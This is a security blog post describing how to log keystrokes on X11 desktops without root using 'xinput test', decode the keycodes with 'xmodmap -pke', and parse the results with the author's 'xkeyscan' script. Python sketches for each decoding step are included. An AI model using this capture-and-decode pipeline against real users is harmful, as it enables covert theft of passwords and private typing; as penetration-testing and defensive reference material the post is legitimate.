A colleague of mine, Sanjiv Kawa, came across a nifty technique for capturing the keystrokes of users on an X-based system. I encourage you to check out his post here, where Sanjiv walks through the process of using xinput to find input devices and then sets up the keylogger for capture. It’s a particularly useful technique against those using GNOME, KDE, or Xfce desktop environments, common on many *nix systems. It has the added bonus of not requiring root privileges to pull off.
For archival’s sake, the process boils down to:
- xinput list - list potential input devices
- Find the XID of the keyboard to monitor
- xinput test <XID> - display input from the device
XID is the “id” number associated with the desired keyboard input device. On my lab machine, this would be id 12:
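The device lookup can also be scripted. Below is a minimal sketch that pulls keyboard ids out of text shaped like the output of xinput list. The sample listing, its device names, and the helper name find_keyboards are all made up for illustration; real output will differ from machine to machine.

```python
import re

# Illustrative text in the general shape printed by `xinput list`.
# Device names and ids are assumptions, not taken from a real machine.
SAMPLE = """\
⎡ Virtual core pointer                      id=2    [master pointer  (3)]
⎜   ↳ Virtual core XTEST pointer            id=4    [slave  pointer  (2)]
⎣ Virtual core keyboard                     id=3    [master keyboard (2)]
    ↳ Virtual core XTEST keyboard           id=5    [slave  keyboard (3)]
    ↳ AT Translated Set 2 keyboard          id=12   [slave  keyboard (3)]
"""

# Skip leading tree-drawing characters, capture the name, then the id,
# and keep only entries tagged as slave keyboards.
DEVICE_RE = re.compile(r"^\W*(.*?)\s+id=(\d+)\s+\[slave\s+keyboard")


def find_keyboards(listing):
    """Return (id, name) pairs for slave keyboard devices in the listing."""
    devices = []
    for line in listing.splitlines():
        match = DEVICE_RE.search(line)
        if match:
            devices.append((int(match.group(2)), match.group(1)))
    return devices


for xid, name in find_keyboards(SAMPLE):
    print(xid, name)
```

On a live system the listing would come from running xinput list itself, and the physical keyboard is usually the entry that is not an XTEST device.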
Now, the output produced by xinput test <XID> isn’t quite the final output we’re looking for. Instead of the characters typed by the user, the result is a series of keycodes. This is the output from typing “nano”:
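To make that raw stream easier to work with, here is a small sketch that turns "key press" and "key release" lines into (action, keycode) tuples. The sample keycodes are what I would expect for "nano" on a common US layout, which is an assumption; the names EVENT_RE and parse_events are mine and are not part of xinput.

```python
import re

# Lines emitted by `xinput test` look like "key press   57".
EVENT_RE = re.compile(r"^key\s+(press|release)\s+(\d+)$")

# Assumed capture of someone typing "nano" on a US layout.
SAMPLE = """\
key press   57
key release 57
key press   38
key release 38
key press   57
key release 57
key press   32
key release 32
"""


def parse_events(lines):
    """Return a list of (action, keycode) tuples, skipping unrelated lines."""
    events = []
    for line in lines:
        match = EVENT_RE.match(line.strip())
        if match:
            events.append((match.group(1), int(match.group(2))))
    return events


events = parse_events(SAMPLE.splitlines())
print(events)
```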
How can these keycodes be translated to something more legible? Well, first we need the system’s device mapping of keycodes-to-keysyms, called a keymap. This is obtainable via xmodmap -pke:
Notice how the keymap has multiple keysym columns for each keycode. This is due to modifiers (Shift, Alt, etc.). With no modifier held, the keysym in the first column is returned. With Shift held, the keysym in the second column is returned, and so on. More details about xmodmap and modifiers can be found here.
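As a rough illustration of the column lookup, the sketch below parses a few lines in the "keycode N = keysym ..." shape and picks the first or second column depending on whether Shift is held. The sample lines are an assumed excerpt of a US keymap, and parse_keymap and lookup are hypothetical helper names; only the first two columns are handled.

```python
# Assumed excerpt of a keymap in the "keycode N = keysyms" format.
SAMPLE = """\
keycode   8 =
keycode  10 = 1 exclam 1 exclam
keycode  38 = a A a A
keycode  50 = Shift_L NoSymbol Shift_L
keycode  57 = n N n N
"""


def parse_keymap(text):
    """Map each keycode to its list of keysym columns."""
    keymap = {}
    for line in text.splitlines():
        parts = line.split()
        # Expected shape: keycode <number> = <keysym> <keysym> ...
        if len(parts) < 3 or parts[0] != "keycode" or parts[2] != "=":
            continue
        keymap[int(parts[1])] = parts[3:]
    return keymap


def lookup(keymap, keycode, shift=False):
    """Return the keysym for a keycode: column 1 plain, column 2 with Shift."""
    keysyms = keymap.get(keycode, [])
    if not keysyms:
        return None
    column = 1 if shift and len(keysyms) > 1 else 0
    return keysyms[column]


keymap = parse_keymap(SAMPLE)
print(lookup(keymap, 38), lookup(keymap, 38, shift=True))
```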
The next logical step is to leverage this keymap to automate the keycode-to-keysym conversion process.
What I ended up creating was a fairly simple Python script called “xkeyscan” which can be found here on GitHub.
I’ve built in some logic to account for modifier keys, such as Shift or Alt, so the parser will correctly determine things like case-sensitivity and special characters.
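To give a feel for what modifier handling involves, here is a simplified sketch of the idea, not the actual xkeyscan code. It tracks whether a Shift key is currently held and picks the shifted or unshifted keysym for each press. The KEYMAP excerpt, the PRINTABLE table, and the decode function are all hypothetical and assume a US layout.

```python
# Hypothetical keymap excerpt: keycode -> (unshifted, shifted) keysym.
KEYMAP = {
    10: ("1", "exclam"),
    32: ("o", "O"),
    38: ("a", "A"),
    50: ("Shift_L", "Shift_L"),
    57: ("n", "N"),
    62: ("Shift_R", "Shift_R"),
    65: ("space", "space"),
}
SHIFT_KEYSYMS = {"Shift_L", "Shift_R"}
# Keysym names that should be rendered as a literal character.
PRINTABLE = {"space": " ", "exclam": "!"}


def decode(events):
    """Turn (action, keycode) events into text, honoring held Shift keys."""
    held_shift = set()
    out = []
    for action, keycode in events:
        unshifted, shifted = KEYMAP.get(keycode, (None, None))
        if unshifted in SHIFT_KEYSYMS:
            # Track Shift state instead of emitting a character.
            if action == "press":
                held_shift.add(keycode)
            else:
                held_shift.discard(keycode)
            continue
        if action != "press" or unshifted is None:
            continue  # ignore releases and unknown keycodes
        keysym = shifted if held_shift else unshifted
        out.append(PRINTABLE.get(keysym, keysym))
    return "".join(out)


events = [
    ("press", 50), ("press", 57), ("release", 57), ("release", 50),
    ("press", 38), ("release", 38),
    ("press", 57), ("release", 57),
    ("press", 32), ("release", 32),
    ("press", 50), ("press", 10), ("release", 10), ("release", 50),
]
print(decode(events))
```

Tracking the held Shift keycodes in a set means that releasing one Shift key while the other is still down keeps the shifted column active.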
The script can be used a handful of ways depending upon how you’d prefer to feed data into it. For the following examples, data is stored to a file called xkey.log using the following syntax:
xkeyscan can parse the file directly:
Or read from stdin:
Or parse in real-time:
Note the usage of Python’s -u switch on the last command. This disables Python’s default buffering, allowing data to be parsed as it’s streamed in. The switch is necessary for real-time parsing when tailing a log file; otherwise the data doesn’t get parsed until Python’s buffer is flushed (for example with a Ctrl-C or Ctrl-D).
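For anyone writing their own parser, a related approach is to read one line at a time and flush the output after every write, so that results appear as the log grows. This is a sketch assuming Python 3, with a hypothetical function name stream_keycodes; it is not how xkeyscan itself is written, and it only echoes pressed keycodes rather than translating them.

```python
import io


def stream_keycodes(source, sink):
    """Write each pressed keycode on its own line, flushing after each one."""
    count = 0
    # readline() returns as soon as a full line is available, so a slowly
    # growing stream is handled line by line until end of input.
    for line in iter(source.readline, ""):
        parts = line.split()
        if len(parts) == 3 and parts[:2] == ["key", "press"]:
            sink.write(parts[2] + "\n")
            sink.flush()  # push the result out immediately
            count += 1
    return count


# Demonstration with in-memory streams standing in for stdin and stdout.
source = io.StringIO("key press   57\nkey release 57\nkey press   38\n")
sink = io.StringIO()
pressed = stream_keycodes(source, sink)
print(pressed, repr(sink.getvalue()))
```

In a real pipeline the same function could be called with sys.stdin and sys.stdout in place of the in-memory streams.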
Here’s the tool in action:
- Capturing is done in the right terminal (using tee to verify output)
- Keystrokes being captured were performed in the top-left terminal
- xkeyscan is tailing and parsing xkey.log in the bottom-left terminal
In its current iteration, the xmodmap legend is statically set. If a system’s keymap differs, the codes array near the top of xkeyscan.py will need to be adjusted accordingly. My plan for v2 is for the script to take xmodmap -pke as input and dynamically generate the appropriate codes. I could even take it a step further and create an all-in-one tool for finding the appropriate device, starting the keylogger, and printing out the parsed result. If you’d like to tackle these changes yourself, feel free to send a pull request!